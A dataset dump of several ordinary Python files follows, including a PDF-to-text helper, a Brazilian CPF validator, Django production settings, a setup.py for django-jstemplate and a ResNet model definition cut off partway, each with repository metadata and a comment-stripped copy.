test = convert_pdf_to_txt(ThePDFFile)
# list of parsed pdf files
parsed_pdfs.append(test)
# list of pdf filenames
fname.append(ThePDFFile)
except Exception:
# if pdf cannot be read, continue to the next pdf
continue
    return parsed_pdfs, fname
'''
text = convert_pdf_to_txt("D:/Dropbox/01_School/18SP/COS498/FinalProject/TestingData/Adam and Michelle Campbell, Pulpit Harbor Salt Pond, N. Haven.pdf")
#print(text)
''' | 32 | 152 | 0.634073 |
import io
import os
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
def convert_pdf_to_txt(path):
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
codec = 'utf-8'
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
fp = open(path, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages,
password=password,
caching=caching,
check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue()
fp.close()
device.close()
retstr.close()
return text
def pdfs2Array(testDataFolder):
parsed_pdfs = []
fname=[]
for pdf in os.listdir(testDataFolder):
if pdf.endswith(".pdf"):
try:
ThePDFFile = (os.path.join(testDataFolder, pdf))
test = convert_pdf_to_txt(ThePDFFile)
parsed_pdfs.append(test)
fname.append(ThePDFFile)
except Exception:
continue
    return parsed_pdfs, fname
| true | true |
1c4a97869018cd998d4a5dc0c14d4c8520f52232 | 851 | py | Python | my_boilerplate_django_admin/core/helpers/string.py | diegoMasin/my-boilerplate-djangoadmin | ef84516957b4742a8459519ace15e37107691456 | [
"MIT"
] | null | null | null | my_boilerplate_django_admin/core/helpers/string.py | diegoMasin/my-boilerplate-djangoadmin | ef84516957b4742a8459519ace15e37107691456 | [
"MIT"
] | null | null | null | my_boilerplate_django_admin/core/helpers/string.py | diegoMasin/my-boilerplate-djangoadmin | ef84516957b4742a8459519ace15e37107691456 | [
"MIT"
] | null | null | null | def is_cpf(cpf):
# Obtém apenas os números do CPF, ignorando pontuações
numbers = [int(digit) for digit in cpf if digit.isdigit()]
# Verifica se o CPF possui 11 números:
if len(numbers) != 11:
return False
# Verifica se todos os números são repetidos
if len(list(dict.fromkeys(numbers))) == 1:
return False
# Validação do primeiro dígito verificador:
sum_of_products = sum(a * b for a, b in zip(numbers[0:9], range(10, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[9] != expected_digit:
return False
# Validação do segundo dígito verificador:
sum_of_products = sum(a * b for a, b in zip(numbers[0:10], range(11, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[10] != expected_digit:
return False
return True
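# Example (well-known sample CPF that satisfies both check digits):
#   is_cpf("529.982.247-25")  # True; punctuation is ignored
#   is_cpf("111.111.111-11")  # False; all digits identical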
| 32.730769 | 81 | 0.642773 | def is_cpf(cpf):
numbers = [int(digit) for digit in cpf if digit.isdigit()]
if len(numbers) != 11:
return False
if len(list(dict.fromkeys(numbers))) == 1:
return False
sum_of_products = sum(a * b for a, b in zip(numbers[0:9], range(10, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[9] != expected_digit:
return False
sum_of_products = sum(a * b for a, b in zip(numbers[0:10], range(11, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[10] != expected_digit:
return False
return True
| true | true |
1c4a980951b00ae54b20a33ead879e7bc50123b1 | 1,172 | py | Python | opentech/settings/production.py | JakabGy/hypha | 32634080ba1cb369f07f27f6616041e4eca8dbf2 | [
"BSD-3-Clause"
] | null | null | null | opentech/settings/production.py | JakabGy/hypha | 32634080ba1cb369f07f27f6616041e4eca8dbf2 | [
"BSD-3-Clause"
] | null | null | null | opentech/settings/production.py | JakabGy/hypha | 32634080ba1cb369f07f27f6616041e4eca8dbf2 | [
"BSD-3-Clause"
] | null | null | null | import os
from .base import * # noqa
# Disable debug mode
DEBUG = False
# Configuration from environment variables
env = os.environ.copy()
# Alternatively, you can set these in a local.py file on the server
try:
from .local import * # noqa
except ImportError:
pass
# Mailgun configuration.
if 'MAILGUN_API_KEY' in env:
EMAIL_BACKEND = 'anymail.backends.mailgun.EmailBackend'
ANYMAIL = {
"MAILGUN_API_KEY": env['MAILGUN_API_KEY'],
"MAILGUN_SENDER_DOMAIN": env.get('EMAIL_HOST', None),
"WEBHOOK_SECRET": env.get('ANYMAIL_WEBHOOK_SECRET', None)
}
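# Example (hypothetical values): export MAILGUN_API_KEY=key-xxxx and
# EMAIL_HOST=mg.example.com to route outgoing mail through Mailgun.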
# Sentry configuration.
if 'SENTRY_DSN' in env:
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.celery import CeleryIntegration
sentry_sdk.init(
dsn=env['SENTRY_DSN'],
environment=env.get('SENTRY_ENVIRONMENT', None),
integrations=[DjangoIntegration(), CeleryIntegration()]
)
# Heroku configuration.
# Set ON_HEROKU to true in Config Vars or via cli "heroku config:set ON_HEROKU=true".
if 'ON_HEROKU' in env:
import django_heroku
django_heroku.settings(locals())
| 27.904762 | 85 | 0.716724 | import os
from .base import *
DEBUG = False
env = os.environ.copy()
try:
    from .local import *
except ImportError:
pass
if 'MAILGUN_API_KEY' in env:
EMAIL_BACKEND = 'anymail.backends.mailgun.EmailBackend'
ANYMAIL = {
"MAILGUN_API_KEY": env['MAILGUN_API_KEY'],
"MAILGUN_SENDER_DOMAIN": env.get('EMAIL_HOST', None),
"WEBHOOK_SECRET": env.get('ANYMAIL_WEBHOOK_SECRET', None)
}
if 'SENTRY_DSN' in env:
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.celery import CeleryIntegration
sentry_sdk.init(
dsn=env['SENTRY_DSN'],
environment=env.get('SENTRY_ENVIRONMENT', None),
integrations=[DjangoIntegration(), CeleryIntegration()]
)
if 'ON_HEROKU' in env:
import django_heroku
django_heroku.settings(locals())
| true | true |
1c4a9a3776b6c9427c9e3dbf1a0cdddedadfcf4c | 1,811 | py | Python | setup.py | mcanu/django-jstemplate | 9af1e22681a318d077f4908b5c92d901e163772f | [
"BSD-3-Clause"
] | 11 | 2015-04-02T00:24:05.000Z | 2020-08-13T01:57:57.000Z | setup.py | mcanu/django-jstemplate | 9af1e22681a318d077f4908b5c92d901e163772f | [
"BSD-3-Clause"
] | 7 | 2015-03-03T09:54:34.000Z | 2021-04-04T14:35:03.000Z | setup.py | mcanu/django-jstemplate | 9af1e22681a318d077f4908b5c92d901e163772f | [
"BSD-3-Clause"
] | 8 | 2015-01-01T18:56:32.000Z | 2019-05-07T18:23:04.000Z | from os.path import join, dirname, abspath
from setuptools import setup, find_packages
here = dirname(abspath(__file__))
long_description = (open(join(here, "README.rst")).read() + "\n\n" +
open(join(here, "CHANGES.rst")).read() + "\n\n" +
open(join(here, "TODO.rst")).read())
def get_version():
fh = open(join(here, "jstemplate", "__init__.py"))
try:
for line in fh.readlines():
if line.startswith("__version__ ="):
return line.split("=")[1].strip().strip('"')
finally:
fh.close()
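# get_version() scans jstemplate/__init__.py for a line such as
# '__version__ = "2.0.0"' (hypothetical value) and returns the bare string.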
setup(
name="django-jstemplate",
version=get_version(),
description="A Django template tag for embedding Mustache.js templates -- or other JavaScript templates -- safely.",
long_description=long_description,
author="Mjumbe Wawatu Ukweli",
author_email="[email protected]",
url="https://github.com/mjumbewu/django-jstemplate/",
packages=find_packages(),
package_data={'jstemplate': ['static/libs/*.js']},
install_requires=[
'Django >= 1.3',
'six'
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Framework :: Django",
],
zip_safe=False,
tests_require=["Django>=1.3", "mock", "six"],
test_suite="runtests.runtests"
)
| 34.169811 | 120 | 0.595803 | from os.path import join, dirname, abspath
from setuptools import setup, find_packages
here = dirname(abspath(__file__))
long_description = (open(join(here, "README.rst")).read() + "\n\n" +
open(join(here, "CHANGES.rst")).read() + "\n\n" +
open(join(here, "TODO.rst")).read())
def get_version():
fh = open(join(here, "jstemplate", "__init__.py"))
try:
for line in fh.readlines():
if line.startswith("__version__ ="):
return line.split("=")[1].strip().strip('"')
finally:
fh.close()
setup(
name="django-jstemplate",
version=get_version(),
description="A Django template tag for embedding Mustache.js templates -- or other JavaScript templates -- safely.",
long_description=long_description,
author="Mjumbe Wawatu Ukweli",
author_email="[email protected]",
url="https://github.com/mjumbewu/django-jstemplate/",
packages=find_packages(),
package_data={'jstemplate': ['static/libs/*.js']},
install_requires=[
'Django >= 1.3',
'six'
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Framework :: Django",
],
zip_safe=False,
tests_require=["Django>=1.3", "mock", "six"],
test_suite="runtests.runtests"
)
| true | true |
1c4a9b7da7a8569e9efe0ece18d83db13ce8a2ef | 16,231 | py | Python | models/resnet.py | zyyhhxx/convNet.pytorch | 85f65f80b6d75810077c54bd3a8c9094cc2a26f9 | [
"MIT"
] | 2 | 2020-07-02T14:21:01.000Z | 2021-01-04T01:52:09.000Z | models/resnet.py | zyyhhxx/convNet.pytorch | 85f65f80b6d75810077c54bd3a8c9094cc2a26f9 | [
"MIT"
] | null | null | null | models/resnet.py | zyyhhxx/convNet.pytorch | 85f65f80b6d75810077c54bd3a8c9094cc2a26f9 | [
"MIT"
] | 1 | 2019-10-02T07:19:26.000Z | 2019-10-02T07:19:26.000Z | import torch
import torch.nn as nn
import torchvision.transforms as transforms
import math
from .modules.se import SEBlock
from .modules.checkpoint import CheckpointModule
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from utils.mixup import MixUp
__all__ = ['resnet', 'resnet_se']
def init_model(model):
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
for m in model.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
model.fc.weight.data.normal_(0, 0.01)
model.fc.bias.data.zero_()
def weight_decay_config(value=1e-4, log=False):
return {'name': 'WeightDecay',
'value': value,
'log': log,
'filter': {'parameter_name': lambda n: not n.endswith('bias'),
'module': lambda m: not isinstance(m, nn.BatchNorm2d)}
}
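# The filter above exempts bias terms and BatchNorm layers from weight decay,
# a common practice when training ResNets.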
def mixsize_config(sz, base_size, base_batch, base_duplicates, adapt_batch, adapt_duplicates):
assert adapt_batch or adapt_duplicates or sz == base_size
batch_size = base_batch
duplicates = base_duplicates
if adapt_batch and adapt_duplicates:
scale = base_size/sz
else:
scale = (base_size/sz)**2
if scale * duplicates < 0.5:
adapt_duplicates = False
adapt_batch = True
if adapt_batch:
batch_size = int(round(scale * base_batch))
if adapt_duplicates:
duplicates = int(round(scale * duplicates))
duplicates = max(1, duplicates)
return {
'input_size': sz,
'batch_size': batch_size,
'duplicates': duplicates
}
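# Worked example (assumed values): with base_size=224, base_batch=64 and
# base_duplicates=1, adapt_batch alone turns sz=112 into
# scale=(224/112)**2=4, i.e. batch_size=256 with duplicates=1; with both
# flags set, scale=224/112=2 scales batch and duplicates alike (128 and 2).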
def ramp_up_fn(lr0, lrT, T):
rate = (lrT - lr0) / T
return "lambda t: {'lr': %s + t * %s}" % (lr0, rate)
def conv3x3(in_planes, out_planes, stride=1, groups=1, bias=False):
"3x3 convolution with padding"
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, groups=groups, bias=bias)
class BasicBlock(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=1,
downsample=None, groups=1, residual_block=None, dropout=0.):
super(BasicBlock, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = conv3x3(inplanes, planes, stride, groups=groups)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, expansion * planes, groups=groups)
self.bn2 = nn.BatchNorm2d(expansion * planes)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
self.dropout = nn.Dropout(dropout)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=4, downsample=None, groups=1, residual_block=None, dropout=0.):
super(Bottleneck, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = nn.Conv2d(
inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=stride, groups=groups)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(
planes, planes * expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * expansion)
self.relu = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self):
super(ResNet, self).__init__()
def _make_layer(self, block, planes, blocks, expansion=1, stride=1, groups=1, residual_block=None, dropout=None, mixup=False):
downsample = None
out_planes = planes * expansion
if stride != 1 or self.inplanes != out_planes:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, out_planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * expansion),
)
if residual_block is not None:
residual_block = residual_block(out_planes)
layers = []
layers.append(block(self.inplanes, planes, stride, expansion=expansion,
downsample=downsample, groups=groups, residual_block=residual_block, dropout=dropout))
self.inplanes = planes * expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, expansion=expansion, groups=groups,
residual_block=residual_block, dropout=dropout))
if mixup:
layers.append(MixUp())
return nn.Sequential(*layers)
def features(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
return x.view(x.size(0), -1)
def forward(self, x):
x = self.features(x)
x = self.fc(x)
return x
class ResNet_imagenet(ResNet):
num_train_images = 1281167
def __init__(self, num_classes=1000, inplanes=64,
block=Bottleneck, residual_block=None, layers=[3, 4, 23, 3],
width=[64, 128, 256, 512], expansion=4, groups=[1, 1, 1, 1],
regime='normal', scale_lr=1, ramp_up_lr=True, checkpoint_segments=0, mixup=False,
base_devices=4, base_device_batch=64, base_duplicates=1, base_image_size=224, mix_size_regime='D+'):
super(ResNet_imagenet, self).__init__()
self.inplanes = inplanes
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
for i in range(len(layers)):
layer = self._make_layer(block=block, planes=width[i], blocks=layers[i], expansion=expansion,
stride=1 if i == 0 else 2, residual_block=residual_block, groups=groups[i],
mixup=mixup)
if checkpoint_segments > 0:
layer_checkpoint_segments = min(checkpoint_segments, layers[i])
layer = CheckpointModule(layer, layer_checkpoint_segments)
setattr(self, 'layer%s' % str(i + 1), layer)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1] * expansion, num_classes)
init_model(self)
batch_size = base_devices * base_device_batch
num_steps_epoch = math.floor(self.num_train_images / batch_size)
# base regime
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 30, 'lr': scale_lr * 1e-2},
{'epoch': 60, 'lr': scale_lr * 1e-3},
{'epoch': 80, 'lr': scale_lr * 1e-4}
]
if 'cutmix' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 75, 'lr': scale_lr * 1e-2},
{'epoch': 150, 'lr': scale_lr * 1e-3},
{'epoch': 225, 'lr': scale_lr * 1e-4}
]
# Sampled regimes from "Mix & Match: training convnets with mixed image sizes for improved accuracy, speed and scale resiliency"
if 'sampled' in regime:
# add gradient smoothing
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
ramp_up_lr = False
self.data_regime = None
def size_config(size): return mixsize_config(size, base_size=base_image_size, base_batch=base_device_batch, base_duplicates=base_duplicates,
adapt_batch=mix_size_regime == 'B+', adapt_duplicates=mix_size_regime == 'D+')
increment = int(base_image_size / 7)
if '144' in regime:
self.sampled_data_regime = [
(0.1, size_config(base_image_size+increment)),
(0.1, size_config(base_image_size)),
(0.6, size_config(base_image_size - 3*increment)),
(0.2, size_config(base_image_size - 4*increment)),
]
else: # sampled-224
self.sampled_data_regime = [
(0.8/6, size_config(base_image_size - 3*increment)),
(0.8/6, size_config(base_image_size - 2*increment)),
(0.8/6, size_config(base_image_size - increment)),
(0.2, size_config(base_image_size)),
(0.8/6, size_config(base_image_size + increment)),
(0.8/6, size_config(base_image_size + 2*increment)),
(0.8/6, size_config(base_image_size + 3*increment)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': base_image_size}
]
if ramp_up_lr and scale_lr > 1: # add learning rate ramp-up
self.regime[0]['step_lambda'] = ramp_up_fn(0.1, 0.1 * scale_lr,
num_steps_epoch * 5)
self.regime.insert(1, {'epoch': 5, 'lr': scale_lr * 1e-1})
class ResNet_cifar(ResNet):
def __init__(self, num_classes=10, inplanes=16,
block=BasicBlock, depth=18, width=[16, 32, 64],
groups=[1, 1, 1], residual_block=None, regime='normal', dropout=None, mixup=False):
super(ResNet_cifar, self).__init__()
self.inplanes = inplanes
n = int((depth - 2) / 6)
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = lambda x: x
self.layer1 = self._make_layer(block, width[0], n, groups=groups[0],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer2 = self._make_layer(block, width[1], n, stride=2, groups=groups[1],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer3 = self._make_layer(block, width[2], n, stride=2, groups=groups[2],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer4 = lambda x: x
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1], num_classes)
init_model(self)
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(1e-4)},
{'epoch': 81, 'lr': 1e-2},
{'epoch': 122, 'lr': 1e-3},
{'epoch': 164, 'lr': 1e-4}
]
if 'wide-resnet' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(5e-4)},
{'epoch': 60, 'lr': 2e-2},
{'epoch': 120, 'lr': 4e-3},
{'epoch': 160, 'lr': 8e-4}
]
# Sampled regimes from "Mix & Match: training convnets with mixed image sizes for improved accuracy, speed and scale resiliency"
if 'sampled' in regime:
adapt_batch = True if 'B+' in regime else False
adapt_duplicates = True if ('D+' in regime or not adapt_batch) \
else False
def size_config(size): return mixsize_config(size, base_size=32, base_batch=64, base_duplicates=1,
adapt_batch=adapt_batch, adapt_duplicates=adapt_duplicates)
# add gradient smoothing
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
self.data_regime = None
self.sampled_data_regime = [
(0.3, size_config(32)),
(0.2, size_config(48)),
(0.3, size_config(24)),
(0.2, size_config(16)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': 32, 'scale_size': 32}
]
def resnet(**config):
dataset = config.pop('dataset', 'imagenet')
if config.pop('quantize', False):
from .modules.quantize import QConv2d, QLinear, RangeBN
torch.nn.Linear = QLinear
torch.nn.Conv2d = QConv2d
torch.nn.BatchNorm2d = RangeBN
bn_norm = config.pop('bn_norm', None)
if bn_norm is not None:
from .modules.lp_norm import L1BatchNorm2d, TopkBatchNorm2d
if bn_norm == 'L1':
torch.nn.BatchNorm2d = L1BatchNorm2d
if bn_norm == 'TopK':
torch.nn.BatchNorm2d = TopkBatchNorm2d
if 'imagenet' in dataset:
config.setdefault('num_classes', 1000)
depth = config.pop('depth', 50)
if depth == 18:
config.update(dict(block=BasicBlock,
layers=[2, 2, 2, 2],
expansion=1))
if depth == 34:
config.update(dict(block=BasicBlock,
layers=[3, 4, 6, 3],
expansion=1))
if depth == 50:
config.update(dict(block=Bottleneck, layers=[3, 4, 6, 3]))
if depth == 101:
config.update(dict(block=Bottleneck, layers=[3, 4, 23, 3]))
if depth == 152:
config.update(dict(block=Bottleneck, layers=[3, 8, 36, 3]))
if depth == 200:
config.update(dict(block=Bottleneck, layers=[3, 24, 36, 3]))
return ResNet_imagenet(**config)
elif dataset == 'cifar10':
config.setdefault('num_classes', 10)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
elif dataset == 'cifar100':
config.setdefault('num_classes', 100)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
def resnet_se(**config):
config['residual_block'] = SEBlock
return resnet(**config)
| 38.462085 | 152 | 0.566385 | import torch
import torch.nn as nn
import torchvision.transforms as transforms
import math
from .modules.se import SEBlock
from .modules.checkpoint import CheckpointModule
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from utils.mixup import MixUp
__all__ = ['resnet', 'resnet_se']
def init_model(model):
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
for m in model.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
model.fc.weight.data.normal_(0, 0.01)
model.fc.bias.data.zero_()
def weight_decay_config(value=1e-4, log=False):
return {'name': 'WeightDecay',
'value': value,
'log': log,
'filter': {'parameter_name': lambda n: not n.endswith('bias'),
'module': lambda m: not isinstance(m, nn.BatchNorm2d)}
}
def mixsize_config(sz, base_size, base_batch, base_duplicates, adapt_batch, adapt_duplicates):
assert adapt_batch or adapt_duplicates or sz == base_size
batch_size = base_batch
duplicates = base_duplicates
if adapt_batch and adapt_duplicates:
scale = base_size/sz
else:
scale = (base_size/sz)**2
if scale * duplicates < 0.5:
adapt_duplicates = False
adapt_batch = True
if adapt_batch:
batch_size = int(round(scale * base_batch))
if adapt_duplicates:
duplicates = int(round(scale * duplicates))
duplicates = max(1, duplicates)
return {
'input_size': sz,
'batch_size': batch_size,
'duplicates': duplicates
}
def ramp_up_fn(lr0, lrT, T):
rate = (lrT - lr0) / T
return "lambda t: {'lr': %s + t * %s}" % (lr0, rate)
def conv3x3(in_planes, out_planes, stride=1, groups=1, bias=False):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, groups=groups, bias=bias)
class BasicBlock(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=1,
downsample=None, groups=1, residual_block=None, dropout=0.):
super(BasicBlock, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = conv3x3(inplanes, planes, stride, groups=groups)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, expansion * planes, groups=groups)
self.bn2 = nn.BatchNorm2d(expansion * planes)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
self.dropout = nn.Dropout(dropout)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=4, downsample=None, groups=1, residual_block=None, dropout=0.):
super(Bottleneck, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = nn.Conv2d(
inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=stride, groups=groups)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(
planes, planes * expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * expansion)
self.relu = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self):
super(ResNet, self).__init__()
def _make_layer(self, block, planes, blocks, expansion=1, stride=1, groups=1, residual_block=None, dropout=None, mixup=False):
downsample = None
out_planes = planes * expansion
if stride != 1 or self.inplanes != out_planes:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, out_planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * expansion),
)
if residual_block is not None:
residual_block = residual_block(out_planes)
layers = []
layers.append(block(self.inplanes, planes, stride, expansion=expansion,
downsample=downsample, groups=groups, residual_block=residual_block, dropout=dropout))
self.inplanes = planes * expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, expansion=expansion, groups=groups,
residual_block=residual_block, dropout=dropout))
if mixup:
layers.append(MixUp())
return nn.Sequential(*layers)
def features(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
return x.view(x.size(0), -1)
def forward(self, x):
x = self.features(x)
x = self.fc(x)
return x
class ResNet_imagenet(ResNet):
num_train_images = 1281167
def __init__(self, num_classes=1000, inplanes=64,
block=Bottleneck, residual_block=None, layers=[3, 4, 23, 3],
width=[64, 128, 256, 512], expansion=4, groups=[1, 1, 1, 1],
regime='normal', scale_lr=1, ramp_up_lr=True, checkpoint_segments=0, mixup=False,
base_devices=4, base_device_batch=64, base_duplicates=1, base_image_size=224, mix_size_regime='D+'):
super(ResNet_imagenet, self).__init__()
self.inplanes = inplanes
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
for i in range(len(layers)):
layer = self._make_layer(block=block, planes=width[i], blocks=layers[i], expansion=expansion,
stride=1 if i == 0 else 2, residual_block=residual_block, groups=groups[i],
mixup=mixup)
if checkpoint_segments > 0:
layer_checkpoint_segments = min(checkpoint_segments, layers[i])
layer = CheckpointModule(layer, layer_checkpoint_segments)
setattr(self, 'layer%s' % str(i + 1), layer)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1] * expansion, num_classes)
init_model(self)
batch_size = base_devices * base_device_batch
num_steps_epoch = math.floor(self.num_train_images / batch_size)
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 30, 'lr': scale_lr * 1e-2},
{'epoch': 60, 'lr': scale_lr * 1e-3},
{'epoch': 80, 'lr': scale_lr * 1e-4}
]
if 'cutmix' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 75, 'lr': scale_lr * 1e-2},
{'epoch': 150, 'lr': scale_lr * 1e-3},
{'epoch': 225, 'lr': scale_lr * 1e-4}
]
if 'sampled' in regime:
